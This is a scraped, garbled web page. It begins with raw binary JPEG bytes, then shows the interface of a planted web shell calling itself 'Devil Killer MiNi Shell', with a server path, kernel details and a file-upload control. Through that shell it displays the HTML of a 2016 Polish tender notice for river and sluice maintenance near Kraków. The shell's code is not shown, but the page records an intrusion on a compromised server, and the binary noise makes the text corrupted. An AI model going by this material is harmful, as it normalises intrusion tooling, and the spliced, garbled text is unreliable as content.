JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160721/147811-N-2016.html

<p class="kh_header"><b>Kraków: Usługi zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie woj.małopolskie zgodnie z poszczególnymi częściami zamówienia</b><br>
<b>Numer ogłoszenia: 147811 - 2016; data zamieszczenia: 21.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych Inspektorat Rejonowy w Krakowie , ul. Kraszewskiego 36, 30-110 Kraków, woj. małopolskie, tel. 12 628 09 80, faks 12 628 09 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie woj.małopolskie zgodnie z poszczególnymi częściami zamówienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część zamówienia nr 40
Konserwacja potoku Sidzinka w km 0+000 -8+300 ureg. w m. Kraków gm. Kraków  
i m. Skawina gm. Skawina powiat krakowski.- km 8,30
Zakres prac :
Wykoszenie i wygrabienie porostów ze skarp 
Wykoszenie i wygrabienie porostów z dna cieku
Usuniecie zatorów i przetamowań z koryta (z krzaków, nanosu, śmieci) 
Oczyszczenie terenu z wywiezieniem i zagospodarowaniem odpadów we własnym zakresie
Część zamówienia nr 41
Konserwacja stopnia wodnego w korycie rzeki Wilgi w km 3+161-3+191oraz naprawa umocnienia koryta w km 3+350 - 3+375 w m. Kraków , gm. Kraków , powiat miasto Kraków - odcinek uregulowany
Zakres prac :
1. Roboty przygotowawcze i pomocnicze 
Roboty pomiarowe ,wycinka krzaków do 10 lat ,  rozbiórka i oczyszczenie elementów z kamienia naturalnego umocnień dna i skarp w obrębie stopnia ,  budowa gródz tymczasowych, wykonanie rurociągu tymczasowego dla przeprowadzenia wód budowlanych . 

2. Roboty ziemne 
Zabudowa wyrwy poprzez zasypanie materiałem ziemnym  z warstwowym ubiciem i zagęszczeniem 
3. Umocnienie dna i skarp rzeki
Naprawa umocnienia z bruku kamiennego polegać będzie na : rozbiórce zniszczonych elementów umocnienia. Następnie na wyprofilownym podłożu zostanie ułożona podsypka żwirowa o grubości 15 cm. Na tak przygotowanym podłożu zostaną ułożone kamienie brukowe - stary kamień pochodzący z rozbiórki oraz nowy uzupełniający ubytki. 50% z rozbiórki , 50% nowego . UWAGA: W kosztorysie inwestorskim zmniejszono o połowę nakład kamienia w m3)m2 umocnienia .
 Kamień po ułożeniu zostanie zaspoinowany  zaprawą cementową . 
4. Naprawa stopnia 
Projektowany remont stopnia polegał będzie na rozbiórce zniszczonych
istniejących elementów betonowych (elementy poziome i pionowe niecki wypadowej, części przelewowej) . Następnie  zostaną przygotowane deskowania i wykonane nowe elementy betonowe z betonu C45)55 o odpowiednich wymiarach sposobem monolitycznym -na mokro. Po osiągnięciu przez beton wymaganej dojrzałości rozbiórce ulegną deskowania. Prace te odbywać się będą w częściach suchych obiektu tzn. odgrodzonych grodzą od nurtu w rzece. 
5.wykonanie robót - naprawa umocnienia skarpy rzeki w obrębie wylotów 
w km 3+350-3+375 
1.rozkucie i usunięcie starego umocnienia z płyt betonowych na zaprawie cementowej sposobem mechanicznym 
2.uzupełnienie skarpy poprzez nadsypanie materiałem ziemnym uprzednio przywiezionym środkami transportowymi z ubiciem i zagęszczeniem 
3.wykonanie nowej okładziny skarpy ( umocnienia ) z bruku kamiennego na podsypce piaskowo-żwirowej gr.10 cm . Kamień o średnicy min.25 cm do zastosowań w budownictwie hydrotechnicznym. Spoiny należy wypełnić zaprawą cementową .
Część zamówienia nr 42 
1.Konserwacja śluzy - prawy wał rzeki Wisła śluza nr 7 km 39+475,
m.Rusocice, gm. Czernichów, pow. krakowski
Zakres prac :
- roboty ziemne w gr.kat.III wykonane koparką podsiębierną o poj.łyżki 0,25m3 z transportem urobku na odl. 0,5km,
  - zasypanie wykopów liniowych w gr.kat.II o ścianach pionowych 
  - plantowanie skarp i dna odpływu w gr.kat.III 
  - zagęszczenie ubijakami mechanicznymi nasypów w gr.sypkim kat.I-II
  - oczyszczenie przepustu 65x60, 1)3 zamulenia,
  - wykonanie ubezpieczenia płytami ażurowymi typu KRATA mała o wym.90x60x10cm,
  - wykonanie palisady wbitej na gł.1,5m z kołków o śr. 12-14cm w gr.kat.III.
  - skucie nierówności betonu, czyszczenie ręczne przez szczotkowanie,
  - zbrojenie siatką stalową fi 12, 15x15, betonowanie przyczółków, wykonanie kołnierza, 
  - montaż klapy zwrotnej przepustu wałowego - zakup i zamontowanie klapy zwrotnej 
    z polietylenu   wysokiej gęstości PEHD, wymiary klapy 65x60, z uszczelką silikonową 
    wraz z  demontażem starej uszkodzonej klapy stalowej, uzupełnieniu braków w przyczółku,
   - obsianie skarp,
2.Konserwacja śluzy - lewy wał rzeki Sanka śluza nr 7 km 3+445, m. Budzyń, gm. Liszki, pow. krakowski 
Zakres prac :
 - roboty ziemne w gr.kat.III wykonane koparką podsiębierną o poj.łyżki 0,25m3 z transportem urobku na odl. 0,5km,
- zasypanie wykopów liniowych w gr.kat.II o ścianach pionowych 
- plantowanie skarp i dna odpływu w gr.kat.III 
- zagęszczenie ubijakami mechanicznymi nasypów w gr.sypkim kat.I-II
- oczyszczenie przepustu 60x65, 1)3 zamulenia,
- grodze drewniano-ziemne, pompowanie wody,
- wykonanie podsypek ze żwiru 10cm
- wykonanie ubezpieczenia płytami ażurowymi typu KRATA mała o wym.90x60x10cm,
- wykonanie palisady wbitej na gł.1,5m z kołków o śr. 12-14cm w gr.kat.III.
- schody na skarpie Sch-2 w gruntach mineralnych spoistych
- skucie nierówności betonu, czyszczenie ręczne przez szczotkowanie,
- zbrojenie siatką stalową fi 12, 15x15, betonowanie przyczółków, wykonanie kołnierza, 
- montaż klapy zwrotnej przepustu wałowego - zakup i zamontowanie klapy
  zwrotnej z polietylenu wysokiej gęstości PEHD, wymiary klapy 60x65,  
  z uszczelką silikonową wraz z demontażem starej uszkodzonej klapy stalowej,
  - obsianie skarp,


Część zamówienia nr 43 
1.Konserwacja lewego wału potoku Kościelnickiego - śluza nr 1 w km 0+502 , śluza nr 2 
w km 1+919  m. Kraków, gm.Kraków, pow. Kraków 
Zakres prac :
Wykoszenie skarp i dna wylotów,
Wykonanie robót ziemnych
Skucie nierówności betonu przy głębokości skucia do 5cm na ścianach przyczółków 
Zagruntowanie powierzchni przyczółków preparatem SIka lub równoważnym 
Wykonanie zaprawy klejowej hydrotechnicznej na siatce z włókna szklanego
Reprofilacja powierzchni przy wlocie i wylocie zaprawą typu PCC
Malowanie farbą betonów zewnętrznych
Demontaż starych klap wraz z wywozem i zagospodarowaniem we własnym zakresie
Zakup i montaż nowych klap zwrotnych (2 szt) przepustu wałowego - klapy PEHD                   (wymiar fi 60cm) z uszczelką silikonową
Rozbiórka i montaż płyt ażurowych typu KRATA mała o wymiarach elementów 90x60x10cm na wylotach
 Po wykonaniu prac teren należy  uporządkować,  gruz i inne odpady wywieźć na   wysypisko.
2.Konserwacja lewego wału rzeka Wisła  - śluza nr 83 w km 100+700 
m. Kraków, gm.Kraków, pow. Kraków
Zakres prac :
Wykonanie robót ziemnych,
Skucie nierówności betonu przy głębokości skucia do 5cm na ścianach przyczółka 
Zagruntowanie powierzchni przyczółków preparatem SIka lub równoważnym 
Wykonanie zaprawy klejowej hydrotechnicznej na siatce z włókna szklanego
Reprofilacja powierzchni przy wlocie i wylocie zaprawą typu PCC
Malowanie farbą betonów zewnętrznych
Demontaż starych klap wraz z wywozem i zagospodarowaniem we własnym zakresie
Zakup i montaż nowych klap zwrotnych (2 szt) przepustu wałowego - klapy PEHD                   (wymiar fi 60cm) z uszczelką silikonową
Rozbiórka i montaż płyt ażurowych typu KRATA mała o wymiarach elementów 90x60x10cm nad przyczółkiem wylotowym z zabetonowaniem na łączeniu                    z betonem
 Po wykonaniu prac teren należy  uporządkować,  gruz i inne odpady wywieźć na   wysypisko.
Część zamówienia nr 44 
1.Konserwacja śluzy - lewy wał potoku Rudno śluza nr 2 km 0+292, 
m. Czernichów, gm. Czernichów, pow. krakowski
Zakres prac :
 - roboty ziemne w gr.kat.III wykonane koparką podsiębierną o poj.łyżki
   0,25m3 z transportem urobku na odl. 0,5km
 - plantowanie skarp i dna odpływu w gr.kat.III
 - wykonanie podsypek ze żwiru 5cm
 - wykonanie ubezpieczenia płytami ażurowymi typu KRATA mała                
   o wym.90x60x10cm,
 - schody na skarpie Sch-2 w gruntach mineralnych spoistych
 - skucie nierówności betonu, czyszczenie ręczne przez szczotkowanie,
 - zbrojenie siatką stalową fi 12, 15x15, betonowanie przyczółków,
   wykonanie kołnierza, 
 - demontaż starej uszkodzonej klapy stalowej, montaż klapy zwrotnej
   przepustu wałowego - zakup i zamontowanie klapy zwrotnej z polietylenu 
   wysokiej gęstości PEHD, wymiary klapy 60x65, z uszczelką silikonową 
   - wypełnienie ubytków zaprawą ZENTRIFIX GM2 PLUS warstwą o grubości  
    10mm w konstrukcji żelbetowej na powierzchniach pionowych
    - obsianie skarp,
2.Konserwacja śluzy - lewy wał rzeki Rudawa śluza nr 19 km 7+988,
 m. Rząska, gm. Zabierzów, pow. krakowski
Zakres prac :
- wycinka drzewa z karczowaniem, rosnącego w przyczółku od strony  odpowietrznej,
- roboty ziemne w gr.kat.III wykonane koparką podsiębierną o poj.łyżki 0,25m3 z transportem urobku   na odl. 0,5km,
 - zasypanie wykopów liniowych w gr.kat.II o ścianach pionowych 
 - plantowanie skarp i dna odpływu w gr.kat.III 
 - zagęszczenie ubijakami mechanicznymi nasypów w gr.sypkim kat.I-II
 - oczyszczenie przepustu 100x120, 1/3 zamulenia,
 - wykonanie podsypek ze żwiru 5cm
   - wykonanie ubezpieczenia płytami ażurowymi typu KRATA mała                
     o wym.90x60x10cm,
    - wykonanie palisady wbitej na gł.1,5m z kołków o śr. 12-14cm w gr.kat.III.
    - schody na skarpie Sch-2 w gruntach mineralnych spoistych
    - skucie nierówności betonu, czyszczenie ręczne przez szczotkowanie,       
      z załadunkiem i wywozem gruzu, z zagospodarowaniem we własnym zakresie,
    - zbrojenie siatką stalową fi 12, 15x15, betonowanie przyczółków,wykonanie kołnierza, 
    - montaż klap zwrotnych przepustu wałowego - zakup i zamontowanie klap
      zwrotnych z polietylenu wysokiej gęstości PEHD, wymiary klapy 100x120,  
      z uszczelką silikonową wraz z demontażem starych uszkodzonych    
      klap stalowych z zagospodarowaniem we własnym zakresie.
      - obsianie skarp,.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3, 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli: a.)1.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie konserwacji, regulacji, usuwaniu szkód powodziowych w korycie rzek i potoków o wartości  co najmniej 20 000,00 zł. każda, odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 40  / z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)2.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie konserwacji, regulacji, usuwaniu szkód powodziowych w korycie rzek i potoków o wartości  co najmniej 70 000,00 zł. każda, odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 41 / z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)3.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie budowy, remontu lub naprawy śluz wałowych o wartości co najmniej 30 000,00 zł. każda ,odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 42,44/ z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie.  
a.)4.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie budowy, remontu lub naprawy śluz wałowych o wartości co najmniej 20 000,00 zł. każda ,odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 43/ z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie.  Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli, .1. wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi  do wykonania zamówienia a w szczególności;  co najmniej 1 koparkę,1 samochód samowyładowczy lub 1 ciągnik  (dotyczy części zamówienia Nr 42,44)
2.wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi  do wykonania zamówienia a w szczególności;  co najmniej ,1 samochód samowyładowczy lub 1 ciągnik  (dotyczy części zamówienia Nr 40,41,43)
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek ten zostanie spełniony jeżeli wykonawca wykaże ,że 1. dysponują osobami posiadającymi kwalifikacje zawodowe, doświadczenie , wykształcenie i uprawnienia niezbędne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (tj. Dz. U. z 2013 r., poz. 1409 z późn. zm.) lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz.U. z 2013 r. poz.932) do kierowania robotami budowlanymi na stanowisku: kierownika budowy, który musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych. W przypadku wykonawców zagranicznych, zamawiający dopuścił równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394 ze zm.)  .Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
